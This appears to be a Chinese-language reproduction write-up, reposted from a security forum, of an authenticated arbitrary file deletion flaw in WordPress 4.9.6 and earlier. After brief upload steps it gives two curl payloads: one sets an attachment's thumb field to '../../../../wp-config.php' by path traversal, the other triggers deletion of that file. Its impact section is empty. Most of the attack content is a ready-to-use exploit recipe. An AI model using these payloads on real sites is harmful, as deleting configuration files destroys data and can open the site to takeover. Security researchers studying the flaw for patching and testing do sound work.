WordPress <= 4.9.6 任意文件删除漏洞

# WordPress <= 4.9.6 任意文件删除漏洞 > 原文:[https://www.zhihuifly.com/t/topic/3261](https://www.zhihuifly.com/t/topic/3261)

# WordPress <= 4.9.6 任意文件删除漏洞 ## 一、漏洞简介 利用条件L:需要进入后台 ## 二、漏洞影响 ## 三、复现过程 ### 添加新媒体 访问http://0-sec.org/wp-admin/upload.php,然后上传图片。 ![imageimg](/static/ApacheCN/unclassified/img/310d024b0359336a0672d29535ea3914.png) ### 将$ meta ['thumb']设置为我们要删除的文件 #### 单击我们在中上传的图像Step 2,并记住图像的ID。 ![imageimg](/static/ApacheCN/unclassified/img/e1d27305d7675aa560ab9a899eaccb10.png) #### 访问http://0-sec.org/wp-admin/post.php?post=4&action=edit._wpnonce在页面源中查找 ![imageimg](/static/ApacheCN/unclassified/img/7cf13de74d450438c06a74e11b87cb25.png) #### 发送有效载荷: ``` curl -v 'http://0-sec.org/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` ![imageimg](/static/ApacheCN/unclassified/img/f8833bcb7b0bcc3a333510c9bfc252da.png) ### 发动攻击 #### 在页面源码中查找 _wpnonce ![imageimg](/static/ApacheCN/unclassified/img/b15ae46cdd5996961cb8b9f185e86107.png) #### 发送有效载荷 ``` curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` ![imageimg](/static/ApacheCN/unclassified/img/1f7a8beb95ed396dbaa960f4c13abd6a.png) #### 刷新页面 ![imageimg](/static/ApacheCN/unclassified/img/5f5aa846c7590defa4cccac0c4e41089.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容